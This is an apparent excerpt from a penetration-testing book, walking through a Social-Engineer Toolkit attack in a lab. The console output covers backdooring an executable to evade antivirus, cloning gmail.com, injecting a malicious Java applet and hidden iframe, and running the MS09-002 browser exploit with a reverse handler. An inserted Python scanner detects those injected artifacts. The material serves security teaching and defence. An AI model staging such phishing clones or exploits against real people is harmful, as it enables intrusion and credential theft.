The Social-Engineer Toolkit

Enter your choice (enter for default):

[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.

********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************

 Enter choice yes or no: no

Enter the browser exploit you would like to use
 8. Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
Enter your choice (1-12) (enter for default): 8

[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: x5sKAzS
[*] Malicious java applet website prepped for deployment

[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.

resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Started reverse handler on 172.16.32.129:443
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://172.16.32.129:8080/
[*] Server started.

To complete the attack setup, select the default reverse Meterpreter payload along with the default encoding and listening port. Choose not to configure a Linux and OS X payload, and then set the browser exploit to Internet Explorer 7 Uninitialized Memory Corruption (MS09-002); SET will then launch the attack.
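As an added defensive example (not code from the book or from SET), the scanner below flags the two artifacts this walkthrough injects into the cloned site: a Java applet tag and a hidden iframe pointing at a host other than the site the page claims to be. The sample HTML is constructed to mimic the injected clone; the host name and payload name are taken from the output above.

```python
"""Flag SET-style injection artifacts (Java applet, hidden/off-origin iframe)
in a page that claims to be a given site. Added example; sample is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a clone of gmail.com carrying an injected applet and an
# invisible iframe that points at the attacker's exploit server on port 8080.
SAMPLE_HTML = """<html><body>
<h1>Gmail</h1>
<applet code="Java.class" archive="x5sKAzS.jar" width="1" height="1"></applet>
<iframe src="http://172.16.32.129:8080/" width="0" height="0"></iframe>
<iframe src="https://accounts.gmail.com/help" width="300" height="200"></iframe>
</body></html>"""


def _tiny(value):
    """True for a width/height that makes an element effectively invisible."""
    return (value or "").strip("\"' ") in ("0", "1")


class InjectionScanner(HTMLParser):
    """Collects (tag, reference, reason) findings while parsing."""

    def __init__(self, expected_host):
        super().__init__()
        self.expected_host = expected_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in ("applet", "embed") or (tag == "object" and "java" in a.get("type", "").lower()):
            # Any Java content on a webmail clone is suspicious on its own.
            self.findings.append((tag, a.get("archive") or a.get("code"), "java-content"))
        elif tag == "iframe":
            src = a.get("src", "")
            host = urlparse(src).hostname or ""
            reasons = []
            if host and host != self.expected_host and not host.endswith("." + self.expected_host):
                reasons.append("off-origin")
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                reasons.append("hidden")
            if reasons:
                self.findings.append((tag, src, ",".join(reasons)))


def scan(html, expected_host):
    """Return the list of suspicious tags found in html for the claimed host."""
    parser = InjectionScanner(expected_host)
    parser.feed(html)
    return parser.findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_HTML, "gmail.com"):
        print(finding)
```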

Once everything is running, you can browse to the website and see what's going on there. A message URL tells you that the site has been moved. Please refer to Figure 10-4 to see what the target will see on his machine.

Click the link and the Metasploit exploit begins. Here's the handler on the backend:

[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption to 172.16.32.131:1329...

This exploit fails, because we are using Internet Explorer 6. The target's screen is shown in Figure 10-6.